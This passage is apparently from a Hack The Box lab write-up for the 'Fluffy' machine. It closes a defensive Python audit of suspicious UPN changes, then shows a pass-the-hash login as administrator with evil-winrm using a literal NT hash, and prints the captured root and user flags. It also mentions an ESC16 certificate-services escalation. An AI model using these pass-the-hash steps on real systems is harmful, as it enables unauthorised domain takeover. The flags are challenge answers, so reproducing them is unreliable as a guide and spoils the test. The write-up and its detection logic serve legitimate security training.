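    # a UPN restored with a suffix that is not a registered UPN suffix
    {"sAMAccountName": "ldap_svc", "userPrincipalName": "ldap_svc@fluffy"},
    # benign naming difference, reported at low severity only
    {"sAMAccountName": "j.fleischman", "userPrincipalName": "joel.fleischman@fluffy.htb"},
]

if __name__ == "__main__":
    for f in audit_upns(SAMPLE_USERS):
        print(f"[{f.severity}] {f.sam}: {f.upn} - {f.reason}")
```

For real-time coverage, feed the same check from Security Event 4738 ("A user account was changed"), whose Changed Attributes section reports the new User Principal Name; the write in step 2 and the restore in step 5 each produce one such event.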

2.2. PTH

┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e  
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
79177fb50dc520d6000139fdb4f33ce5

*Evil-WinRM* PS C:\users\winrm_svc\desktop> type user.txt
a30df7f4961e6d26898035d508f23f44

Thanks to @sunset for the hint; I was stuck on ESC16 for a long time (this bug is fairly new, and you need the latest version of certipy to detect it).